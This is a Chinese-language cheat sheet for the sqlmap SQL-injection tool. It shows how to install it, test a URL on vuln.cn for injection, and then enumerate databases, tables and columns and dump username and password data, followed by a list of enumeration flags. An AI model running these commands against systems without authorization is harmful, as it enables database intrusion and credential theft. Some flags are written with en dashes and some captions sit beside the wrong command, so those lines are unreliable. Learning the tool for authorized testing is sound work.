安装方法

你可以点击这里下载最新的tar打包的源代码或者点击这里下载最新的zip打包的源代码。

推荐你从Git的仓库获取最新的源代码：

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap可以运行在Python 2.6.x 和 2.7.x版本的任何平台上

使用方法

通过如下命令可以查看基本的用法及命令行参数：

python sqlmap.py -h

通过如下的命令可以查看所有的用法及命令行参数：

python sqlmap.py -hh

检测注入

基本格式

sqlmap -u “http://www.vuln.cn/post.php?id=1”

默认使用level1检测全部数据库类型

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面）

从post数据包中注入

可以使用burpsuite或者temperdata等工具来抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

注入成功后

获取网站基本信息

查询数据库的基本信息

sqlmap -u “http://www.vuln.cn/post.php?id=1” 

查询当前网站的数据库

sqlmap -u “http://www.vuln.cn/post.php?id=1” --current-db

查询表名

sqlmap -u “http://www.vuln.cn/post.php?id=1” --current-db --tables -D 库名

查询test数据库中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1” -T 表名 --columns

dump出字段username与password中的数据

sqlmap -u “http://www.vuln.cn/post.php?id=1”  -T 表名 --dump

Enumeration（枚举）：

–current-user 检索数据库管理系统当前用户

–current-db 检索数据库管理系统当前数据库

–users 枚举数据库管理系统用户

–passwords 枚举数据库管理系统用户密码哈希

–dbs 枚举数据库管理系统数据库

-D DBname 要进行枚举的指定数据库名

-T TBLname 要进行枚举的指定数据库表（如：-T tablename –columns）

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump 转储数据库管理系统的数据库中的表项

–dump-all 转储所有的DBMS数据库表中的条目

-C COL 要进行枚举的数据库列

-U USER 用来进行枚举的数据库用户

–level=LEVEL 执行测试的等级（1-5，默认为1）

–forms 对目标URL的解析和测试形式（万能密码可以使用此参数）

附上大佬的博客http://www.vuln.cn/1992